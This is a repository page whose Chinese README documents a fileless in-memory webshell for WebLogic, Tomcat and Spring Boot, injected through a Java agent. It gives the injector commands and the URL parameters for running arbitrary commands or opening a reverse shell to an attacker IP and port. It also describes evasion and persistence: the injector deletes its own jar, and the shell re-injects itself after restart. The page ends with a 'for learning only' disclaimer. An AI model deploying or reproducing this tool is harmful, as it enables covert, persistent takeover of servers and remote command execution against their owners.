# weblogic_memshell

**Repository Path**: keyboxdzd/weblogic_memshell

## Basic Information

- **Project Name**: weblogic_memshell
- **Description**: 适用于weblogic和Tomcat的无文件的内存马
- **Primary Language**: Unknown
- **License**: Not specified
- **Default Branch**: master
- **Homepage**: None
- **GVP Project**: No

## Statistics

- **Stars**: 0
- **Forks**: 0
- **Created**: 2022-02-15
- **Last Updated**: 2022-02-15

## Categories & Tags

**Categories**: Uncategorized

**Tags**: None

## README

# 说明
一个基于`javaagent`+`ASM`的无文件落地的javaagent，兼容多种容器(weblogic,Tomcat,Springboot).

# inject jdk要求
* Java 8

# agent jdk要求
* Java 6-11

# 兼容版本
* weblogic 10.3.6
* weblogic 12.2.1.2
* weblogic 12.2.1.3
* weblogic 12.1.3.0
* Tomcat 8.5.61
* Spring boot

# 测试平台
* macos 10.0+
* centos 7.1
* windows 10
* windows 11

# 使用说明
## inject 参数
```shell
java -jar inject.jar [your_password]  # 通用运行
java -jar inject.jar -p               # 打印所有运行的java进程名
java -jar inject.jar [your_password] [process_name] # 定向注入到[process_name]
```
## 请求参数

```text
任意url?psw =[your_password]&cmd=[your_cmd]  执行任意命令
任意url?psw =[your_password]&ip=[attack_ip]&port=[attack_port] 反弹shell
```

# 测试案例
运行`java -jar inject-1.0.jar x1001`
![java](./img/java.png)
在服务器端可以看到以下，说明注入成功，并删除当前jar包，达到无shell状态：
![server](./img/server.png)
访问任意url，带上参数`psw=your_password&cmd=your_cmd`
![request](./img/request.png)
当应用关闭时。攻击jar包自动生成到java虚拟机目录下。
![persist](./img/persist.png)
下次启动，自动注入达到持久化的效果。
![persist2](./img/persist2.png)

> 经测试，通过`kill -9`或者`强制结束进程`杀死容器进程，并不会触发`addShutdownHook`,也就不会持久化。
>网上查询以下几种杀死进程的情况:
>* 所有的线程已经执行完毕（√）
>* 调用System.exit()（√）
>* 用户输入Ctrl+C（√）
>* 遇到问题异常退出（√）
>* kill -9 杀掉进程（×）

# 更新
## 2021/06/19
* 修改hook点为`javax/servlet/FilterChain`，使其同时兼容tomcat.
* weblogic注入内存马，现在访问任意url，带上密码和命令即可

## 2021/12/02
* 简化hook流程
* 去除大部分打印
* inject.jar增加自定义hook的进程
* 增加反弹shell

# 参考
https://github.com/rebeyond/memShell

# 声明
本项目仅供学习使用，勿做它用